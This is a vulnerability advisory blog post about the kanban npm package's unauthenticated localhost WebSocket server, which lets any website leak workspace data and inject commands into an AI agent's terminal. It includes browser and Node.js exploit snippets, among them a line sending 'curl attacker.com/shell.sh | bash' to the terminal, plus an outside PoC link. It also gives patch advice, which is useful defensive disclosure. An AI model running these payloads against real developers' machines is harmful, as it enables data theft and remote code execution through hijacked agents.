Listen to this Post
How the CVE works:
The kanban npm package launches a WebSocket server on 127.0.0.1:3484 without Origin header validation. Any website a developer visits can connect cross-origin because WebSocket connections bypass CORS. The server exposes three unauthenticated endpoints: /api/runtime/ws (streams full workspace snapshot including file paths, task s, git branch, AI chat messages), /api/terminal/io (accepts raw bytes written directly to the agent PTY), and /api/terminal/control (allows killing tasks). On connection, runtime WS immediately sends a snapshot: currentProjectId, projects (filesystem paths), workspaceState (repoPath, git, board tasks). The terminal I/O WS writes any received message to the agent terminal. The control WS accepts {“type”:”stop”} to terminate any task. An attacker can leak sensitive data in real time, detect running AI agent sessions via task_sessions_updated messages, then hijack the terminal by injecting a command plus carriage return (\r) to achieve remote code execution, or kill tasks for denial of service. No authentication, no token, no Origin check. The browser freely connects to localhost from any origin. The attack requires victim to run kanban (or cline –kanban) and visit a malicious webpage. Minimal reproduction: new WebSocket(“ws://127.0.0.1:3484/api/runtime/ws”) leaks repoPath and git info immediately.
DailyCVE form:
Platform: Node.js npm
Version: kanban v0.1.59
Vulnerability: Missing Origin validation
Severity: Critical
date: 2026-05-08
Prediction: Patch within 14 days
What Undercode Say:
Analytics
Check if kanban WebSocket server is exposed
curl -i -H "Origin: https://evil.com" -H "Connection: Upgrade" -H "Upgrade: websocket" http://127.0.0.1:3484/
Simulate info leak via browser console
ws = new WebSocket("ws://127.0.0.1:3484/api/runtime/ws"); ws.onmessage = e => console.log(JSON.parse(e.data).workspaceState?.repoPath);
Monitor active task sessions
ws.onmessage = e => { let m = JSON.parse(e.data); if(m.type === "task_sessions_updated") console.log(m.summaries); };
Terminal hijack demo (Node.js)
const WebSocket = require('ws'); const term = new WebSocket('ws://127.0.0.1:3484/api/terminal/io?taskId=abc12&workspaceId=myproject'); term.on('open', () => term.send(Buffer.from('curl attacker.com/shell.sh | bash\r')));
Exploit:
From any attacker-controlled site, JavaScript connects to ws://127.0.0.1:3484/api/runtime/ws to leak workspace paths, git branch, task s. Listens for task_sessions_updated to get running taskId and workspaceId. Then opens ws://127.0.0.1:3484/api/terminal/io?taskId=…&workspaceId=… and sends malicious command + \r. AI agent executes it as user input. Also can send {“type”:”stop”} to /api/terminal/control to kill tasks. Full PoC at http://cline.sagilayani.com:1337/?key=clinevuln2026.
Protection from this CVE
Validate Origin header on all WebSocket upgrades, allow only 127.0.0.1:3484. Generate a random session token at server startup, require it as query parameter for every WS connection. Authenticate terminal WS against the token. Use same-origin policy enforcement and CORS headers for HTTP fallback.
Impact
Information disclosure (full workspace, tasks, git, AI chat), remote code execution via terminal hijack, denial of service by killing agent tasks. Attack requires victim to run kanban and visit malicious webpage; no additional interaction.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
